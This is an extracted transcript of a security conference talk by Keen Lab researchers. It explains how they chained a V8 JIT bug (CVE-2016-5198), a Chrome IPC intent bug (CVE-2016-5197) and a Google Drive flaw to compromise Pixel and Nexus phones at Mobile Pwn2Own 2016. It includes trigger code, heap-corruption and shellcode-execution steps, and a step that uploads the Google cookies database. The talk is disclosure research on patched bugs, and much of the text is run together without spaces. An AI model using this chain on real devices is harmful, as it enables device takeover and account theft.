Pwningthe Nexus ™of Every - Flanker Sky
Transcript of Pwningthe Nexus ™of Every - Flanker Sky
Pwning theNexus ™ ofEveryPixel ™
Qidan HeCredits also to: Gengming Liu
*NexusandPixelareregisteredtrademarksofGoogleInc.
#whoami
• Qidan He• SeniorSecurityResearcheratKeenLab• Apple/Android/ChromeCVEhunter(“frequentcreditor”)• SpeakeratBlackHat USA/ASIA,DEFCON,RECON,CanSecWest,HITCON,QMSS• Pwn2Own2016/MobilePwn2Own2016winner
• Gengming Liu• SecurityResearcherInternatKeenLab• CTFenthusiastic,DEFCONCTFfinalplayer• CaptainofAAACTFteam• MobilePwn2Own2016winner
AboutTencent KeenSecurityLab
• Previously known as KeenTeam• 2016PC/MobileMasterofPwn• Pwn2Ownchampionsin2013,2014,2015,2016,(2017currentlyrunning)• Pwnie Nominationsin2015,2016
TL;DR:HowwepwnednewestNexus6P/PixelrunningNougat• Threebugsformsacompleteexploitchain• OneV8bugtocompromisetherenderer• OneIPCbugtoescapesandbox• Onebugingapps allowsappinstall
• Googleresponseveryquickly• V8andIPCbugfixedinmidnightof10.26(CVE-2016-5197andCVE-2016-5198)• Gapp updatepushedin10.27(GoogleVRPcredit)
Agenda• IntroductionandExploitationofV8engine• IntroductionandExploitationofsandboxonAndroid•HowwepwnedNexus/PixelonMobilePwn2Own2016with3bugs• CVE-2016-5197/5198/GoogleVRP bug
HistoryofclassicalChromeexploits
• MWRLabs,Pwn2Own2013• Type-confusioninwebkit• ArbitraryzerowriteinIPC::OnContentBlocked
• PinkiePie,MobilePwn2Own2013• Runtime_TypedArrayInitializeFromArrayLike forrenderercodeexecution• ArbitraryfreeinClipboardHostMsg_WriteObjectsAsync
• Geohot inPwnium 4• PropertyredefinitionleadtoOOBread/writeinrenderer• SpoofIPCMessagetovulnerableextensioninprivilegeddomain
• Lokihart inPwn2Own2015• TOCTOUinGPUprocesssharedmemory
• Juri InPwn2Own2015• UAFinP2PSocketDispatcherHost
V8Javascript Engine
• Widelyknownandused• RuntimeoptimizationandJITtomachinecode• Strongtalk• Crankshaft• Turbofan
ObjectstructureinV8
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
0x2036cb90a089:[JSArrayBuffer]- map=0xebbd6702db1[FastProperties]- prototype=0x32cfe5005599- elements=0x1b6415782241<FixedArray[0]>[FAST_HOLEY_SMI_ELEMENTS]- internalfields:2- backing_store=0x5652757bea60- byte_length=24929- properties={}- internalfields={00}
vara=newArrayBuffer(0x6161)
pwndbg$x/30xg0x00002036cb90a0880x2036cb90a088:0x00000ebbd6702db10x00001b64157822410x2036cb90a098:0x00001b64157822410x00006161000000000x2036cb90a0a8:0x00005652757bea600x0000000000000004
BoxinginV8
• Float&Double encapsulatedinV8heap• HeapNumber object• vmovsd QWORDPTR[rax+0x7],xmm0
• SMI• 31bitintegerwithlowestbitsetto0
• Taggedpointer
CVE-2016-5198– ChainofBugs#1
• FoundbyKeenLab andusedforMobilePwn2Own2016• AffectsallenginesbasedonV8andapplicationswithWebview
Howweexploited CVE-2016-5198
CVE-2016-5198ByKeenLab
JITworkflowoverview
• JITcompilermodes• Interpretmode– onstartup,naïve,slow,safe• Optimizedmode– afterprofiling,fast
• Optimizedcodegeneratedaccordingtotype-infocollected• Whatifobjecttypechanged?• maptypecheckwillfail- Deoptimize andregenerate
Deoptimization
• EagerDeoptimization• Usuallyseeninfunctionargumentchecks• Bailouttointerpretermodeimmediately
• LazyDeoptimization• Usuallyseenonglobalobjectaccess• Whochangestheobjectisresponsibleforpatchingfollowingusers
• WhatifitselfisalsoJITed?
OOBinOptimizedJITcode
function Ctor() {n = new Set();}function Check() {n.xyz = 0x826852f4;parseInt('AAAAAAAA');}for(var i=0; i<2000; ++i) {Ctor();}for(var i=0; i<2000; ++i) {Check();}Ctor();Check();print("finish");
var n;function Ctor() {n=new Set();}function Check() {n.xyz =0x826852f4;}Ctor();Ctor();%OptimizeFunctionOnNextCall(Ctor);Ctor();Check();Check();%OptimizeFunctionOnNextCall(Check);Check();Ctor();Check();parseInt('AAAAAAAA')
WhatJITdoes?
OOBinOptimizedJITcode
OptimizedcodeforCtor
Non-optimizedcodeforfunc`Check`
Optimized
optimizedcodeforfunc`Check`
Optimized
0x3f9385872433548b8c1bf4a339d070000REX.Wmovq rax,0x79d334abfc1;;object:0x79d334abfc1PropertyCell for0x130199d54631<aSetwithmap0x1ffdd430c391>
0x3f93858724d45488b400fREX.Wmovq rax,[rax+0xf]
#js:Getglobalvariablen
Optimized
0x3f9385872514949ba0000805e0a4de041REX.Wmovq r10,0x41e04d0a5e8000000x3f93858725b59c4c1f96ec2vmovq xmm0,r100x3f93858726064488b4007REX.Wmovq rax,[rax+0x7]0x3f93858726468488b400fREX.Wmovq rax,[rax+0xf]0x3f93858726872c5fb114007vmovsd [rax+0x7],xmm0
n.xyz =0x826852f4
Heapnumberoverwrite
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x31337
Map length:1
Non-empty FixedArray
Property1 …
Javascript: n.xyz = 0x31337
• Optimizedcodeassumestheobjectalreadyhaveproperty
Nomaptypecheck
However…
• Whatiftheobjectischangedanditdoesn’thavepropertynow?• Andthemapcheckiseliminatedingeneratedcode…• ASSUMPTIONINVALID!
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map Hashcode
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]
mov rax,QWORD PTR [rax+0x7]
0x31337
OUT OF BOUNDS HERE!
Map length:1
Non-empty FixedArray
Property1 Property
Map value
PROP_CELL_MAP0x2ab4ce002a99
Map Properties
elements
PropertyCell n: 0x79d334abfc1
JSSet: 0x130199d5c511
tables
JS_SET_TYPE_MAP
Map length:0
Empty FixedArray
Map Hashcode
Null string
length Chars
mov rax,QWORD PTR [rax+0xf]mov rax,QWORD PTR [rax+0x7]
0x826852f4
Map …type
Map for ONE_BYTE_INTERNALIZED_STRING_TYPE
…
vmovsd QWORD PTR [rax+0x7],xmm00x41e04d0a5e800000
Confused to EXTERNAL_STRINGChars interpreted as Pointer
Map Hashcode length Chars
0x4141414141..
AAAA
mov rax,QWORD PTR [rax+0xf]
ExploitationSteps
• OOBwritecharsfieldofnullstringtoleakArrayBufferaddress• OverwriteArrayBufferbacking_store toleakFunctioncodeaddress• OverwriteArrayBufferbacking_store withFunctioncodeaddress• WriteshellcodetoArrayBufferandexec!
Primitives
• Writeprimitive:• Sequentialwrite
• n.b =0x31337• HeapNumber write
• *(p+8)=v
• Readprimitive• ArrayBuffer storageisourfriend
• Heapnumber overwriteArrayBuffer_len_ptr (storage-8)• Butfirst… leakanArrayBuffer addresstoknowwheretowriteto
• Use#nullstringtocoldstart!
StructureofONE_BYTE_INTERNALIZED_STRINGpwndbg>job0x28b4ff7ab259#nullpwndbg>x/40xg0x28b4ff7ab2580x28b4ff7ab258: 0x0000090b4b182361 0x000000005887594a0x28b4ff7ab268: 0x0000000400000000 0xdeadbeed6c6c756e
#nullstringascoldstart– Run#1
• OOBwritenullstringlength• OOBwritecharsfield• m.d =ab(newArrayBuffer)• newString(null)
• charCodeAt foreachbyte• ArrayBuffer and#nullstringaddressleaked!
• Turnlimitedsequentialwriteintoarbitraryaddresswrite
Map length:0
Empty FixedArray
Map Hashcode
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.e = ab
m.d = null_str
Note:canassignobjecttofieldbutcannotdirectlyassignPointertofielde.g.`hashcode`(willdereferencefieldasPointerwrappedasfloatin64bit!)
#nullstringascoldstart– Run#2
• PerformHeapNumber overwriteinnextoptimizationrun• m.d =unpackIEEE754(ab_len_addr)
Map length:0
Empty FixedArray
Map (Overwritten)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.d = *float*(ab_len_ptr)
Map Properties
Elements length storage
PlaywithFunction– Run#3
• Function allocatd atbeginning• ab_storage_ptr =ab_len_ptr +8• m.b =unpackIEEE754(addr_of_code - 8)• Canabitrary readnow...Readwhat?
• DuringstartupFunctionaddressalsoliesbeforeArrayBuffer• HeapNumber overwrite*ab_storage_ptr =code_loc – 8• Code_ptr =ab[3]<<32+ab[2]
Map length:0
Empty FixedArray
MapNow
#ab_len ptr)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.b = *float*(code_ptr - 8)
Map Properties
Elements length
storage(Overwri
tten)Map Properti
esElement
s … … CODE
PlaywithFunction– Finalrun
• m.b =unpackIEEE754(code_ptr)• *ab_storage_ptr =code_ptr• Writeshellcodewithabaccess• CallFunction• Gameover!J
Map length:0
Empty FixedArray
MapNow
#ab_len ptr)
Null string
length
m.a = m.a
unchanged
m.c = 0x200000
overwritten
var ab = new ArrayBuffer(40000);
chars(Now #null
pointer)
chars(Now ab
ptr)
m.e = *float*(code_ptr)
Map Properties
Elements length
storage(Overwri
tten)Map Properti
esElement
s … … CODE
Write your shellcode on new Uint32Array(ab)!
0x2f8c75784bc0 <Function:~ :1>: 0x8b485756e5894855 0x41830f498b482f4f 0x2f8c75784bd0 <Function:~ :1+16>: 0x000c50a53b49011b 0xfff57b20e8057300 0x2f8c75784be0 <Function:~ :1+32>: 0xbab9bb48a0458b49 0x4383000021ea1e72 0x2f8c75784bf0 <Function:~ :1+48>: 0x7a86e8501f79d10b 0x72bab9bb4858fff5 0x2f8c75784c00 <Function:~ :1+64>: 0x00ba49000021ea1e 0x4c00001800000000 0x2f8c75784c10 <Function:~ :1+80>: 0x900008c2c9075389 0xdeadbeed00000000’
Sorenderercodeexecutiongot…
• Nowwhat?
Theanatomy ofChromesandbox
• AlluntrustedcoderunsinTargetprocess• RelaymostoperationstoBroker• Trybestto• lockdownthecapabilitiesofrenderer
• Evenrendereriscompromised• Accessisstillstrictlyprohibited
• GPUprocesshavehigherlevelaccess• Thannormalsandboxprocess
Untrusted_app
ProcessprivilegesinAndroid
Isolated_app
media
radio
System_server
KernelAdb shell
State-of-artdefenseofAndroidsandbox
• DACintroducedbynatureofLinux• IsolatedProcess introducedinJellyBean• SELinux enforcedinKitKat• Furtherrestrictedinsubsequentrelease
So… HowdoweescapethesandboxinMobilePwn2Own2016?ChainofBugs#2
Webviewinappisnotisolated
• Webview stillrunsinthesameuid/processasordinaryapp• Findsomeappwhichacceptscontrolled-URLtoattack• Oops..NoBROWSABLEones… butwehaveIPCbugtorescue!
void RenderViewImpl::LaunchAndroidContentIntent(const GURL&intent,size_t request_id,bool is_main_frame){if (request_id !=expected_content_intent_id_)return;
//Removethecontenthighlightingifany.ScheduleComposite();
if (!intent.is_empty()){base::RecordAction(base::UserMetricsAction("Android.ContentDetectorActivated"));Send(newViewHostMsg_StartContentIntent(GetRoutingID(),intent,is_main_frame));}}//src/content/renderer/renderer_view_impl.cc
bool RenderWidgetHostViewAndroid::OnMessageReceived(const IPC::Message&message){//…bool handled=true;IPC_BEGIN_MESSAGE_MAP(RenderWidgetHostViewAndroid,message)IPC_MESSAGE_HANDLER(ViewHostMsg_StartContentIntent,OnStartContentIntent)IPC_MESSAGE_HANDLER(ViewHostMsg_SmartClipDataExtracted,OnSmartClipDataExtracted)IPC_MESSAGE_HANDLER(ViewHostMsg_ShowUnhandledTapUIIfNeeded,OnShowUnhandledTapUIIfNeeded)IPC_MESSAGE_UNHANDLED(handled=false)IPC_END_MESSAGE_MAP()return handled;}
publicvoidonStartContentIntent(Contextcontext,StringintentUrl,boolean isMainFrame){Intentintent;//PerformgenericparsingoftheURItoturnitintoanIntent.try{intent=Intent.parseUri(intentUrl,Intent.URI_INTENT_SCHEME);
Stringscheme=intent.getScheme();intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);}catch(Exceptionex){Log.w(TAG,"BadURI%s",intentUrl,ex);return;
}try{
context.startActivity(intent);}catch(ActivityNotFoundException ex){}}
CVE-2016-5197Arbitraryintentstartinbroker
CVE-2016-5197
CVE-2016-5197ByKeenLab
MobilePwn2OwnChainofBugs#3
• SeethatholyGoogleDrive• HavefullaccesstoGoogleaccount• TrustedbyGooglePlay• To“install”app
• Blindlyopensanyintent-controlledURL• Pwn ittojumpfromisolatedtountrusted• PlusAppinstallationability!
Sandbox (runs v8)(isolated_app)
Broker(untrusted_app)
startContentIntentString
Google Drive(Runs v8)OpenUrlActivity
Intent with payload URL
`Click` IPCs
Intent is added Browsable
Chainitalltogether
• UseCVE-2016-5198togaincontrolofrendererinChromebrowser• Note:ChromeonAndroidcurrentlyis32bit
• SearchforIPCobjects,issueViewHostMsg_StartContentIntentrequest• JumptoGoogleDrive,openEXPpageagain• Note:GoogleDriveisa64bitappsoitswebview isalso64bit
• Gotashellinuntrusted_app contextfromGoogleDrive• Reloadplay.google.com,uploadcookies.db inappdatadirectory• OrjustsendintenttoGooglePlay appforittoinstall
• Sendinstallapprequest,waitforBOOM
Mitigations?
• ForbidopeninguntrustedURLs(tempsolution)• Webview multiprocess aslongtermsolution• Buthowaboutdevicespre-N?
• On-deviceconfirmationwheninstallingfromplay.google.com?
NoGooglePlay/GoogleDrive,noconcern?
• Vendorsmakemorestupidmistakes• Variousappstores containswebview• Oneevenrunswebview assystem-uid - -!
Furtherthought
• Isitpossibletoapplywebview sandboxingatapplicationlevelinpre-Ndevices?
DEMO
Acknowledgements
• AllcolleaguesatKeenLab
Questions?